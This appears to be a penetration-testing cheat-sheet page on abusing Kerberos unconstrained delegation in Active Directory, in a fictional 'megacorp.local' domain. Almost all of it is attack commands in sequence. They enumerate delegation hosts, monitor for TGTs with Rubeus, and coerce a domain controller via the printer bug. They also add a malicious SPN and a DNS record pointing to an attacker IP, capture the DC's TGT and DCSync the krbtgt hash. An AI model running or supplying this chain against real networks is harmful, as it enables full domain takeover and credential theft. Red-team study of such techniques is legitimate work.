Comment on page


PowerView3 > Get-DomainComputer -Unconstrained | select dnshostname,samaccountname,useraccountcontrol

Monitor for TGTs

Coerce authentication from a DC while monitoring for TGTs in the background on the owned unconstrained delegation system:
Cmd > .\Rubeus.exe monitor /targetuser:DC01$ /interval:5 /nowrap /runfor:60 [/registry:SOFTWARE\MONITOR] [/consoleoutfile:C:\Windows\Temp\monitor.txt]
Cmd > .\SpoolSample.exe dc01.megacorp.local srv01.megacorp.local
Use ticket_converter or to convert the TGT from .kirbi to .ccache (usable with impacket):
$ python dc01.kirbi dc01.ccache
$ KRB5CCNAME=`pwd`/dc01.ccache ...
If output goes to the /registry:
PS > Get-ItemProperty HKLM:\SOFTWARE\MONITOR\[email protected]
PS > Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force

"Relaying" Kerberos

From Zero Credential to Full Domain Compromise (Haboob Team).pdf

Printer Bug + DCSync

  • Owned computer account with unconstrained delegation enabled (SRV01).
  • Printer bug on a domain controller (DC01).
  • Permissions to add an SPN for the owned computer account and a new DNS record in AD.
1. Grab owned computer account password to calculate its Kerberos AES key. This is done automatically when extracting the password remotely with, or it will be done later by when providing it the password in hex from local output:
# Remotely
$ MEGACORP/snovvcrash:'Passw0rd!'@SRV01.megacorp.local -ts
# Locally
Cmd > reg.exe save hklm\system system.hive
Cmd > reg.exe save hklm\security security.hive
$ -system system.hive -security security.hive LOCAL
2. Add a malicious SPN for the owned computer account with unconstrained delegation:
# Check (no modifications)
$ python -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local -q DC01.megacorp.local
# Adding servicePrincipalName that doesn't match full hostname or samAccountName will fail
$ python -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local DC01.megacorp.local
# But modifying msDS-AdditionalDnsHostName will succeed
$ python -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local DC01.megacorp.local --additional
3. Add a DNS record pointing to the attacker's host:
$ python -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -r evil.megacorp.local -d <ATTACKER_IP> --action add DC01.megacorp.local
4. Check that the record was added successfully (~ 3 minutes):
$ nslookup evil.megacorp.local <DC01_IP>
Name: evil.megacorp.local
5. Start providing AES key of the owned computer account or its plain password in hex with salt:
# In case was used remotely
$ sudo python -aesKey 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff
# In case was used locally
$ sudo python --krbhexpass <PLAIN_PASSWORD_HEX> --krbsalt MEGACORP.LOCALhostsrv01.megacorp.local
6. Coerce the authentication to attacker's host from DC01 by triggering printer bug:
$ python megacorp.local/'SRV01$'@DC01.megacorp.local -hashes aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 evil.megacorp.local
7. Export extracted TGT and perform DCSync to get krbtgt hash (or any other privileged account hash):
$ export KRB5CCNAME=`pwd`/'[email protected][email protected]'
$ DC01.megacorp.local -dc-ip <DC01_IP> -just-dc-user 'MEGACORP\krbtgt' -k -no-pass
8. Cleanup. Delete SPN and DNS record:
$ python -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local -r DC01.megacorp.local --additional
$ python -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -r evil.megacorp.local -d <ATTACKER_IP> --action remove DC01.megacorp.local
# Check if the SPN was deleted successfully
$ windapsearch --dc -d megacorp.local -u 'SRV01$' --hash fc525c9683e8fe067095ba2ddc971889 -m computers --attrs servicePrincipalName | grep SRV01
Other scenarios:
  • In this blogpost it is described how to perform the attack by abusing a service (user) account with unconstrained delegation enabled.
  • In this blogpost it is described how to perform the attack from Windows by extracting TGT with Inveigh.
Last modified 7mo ago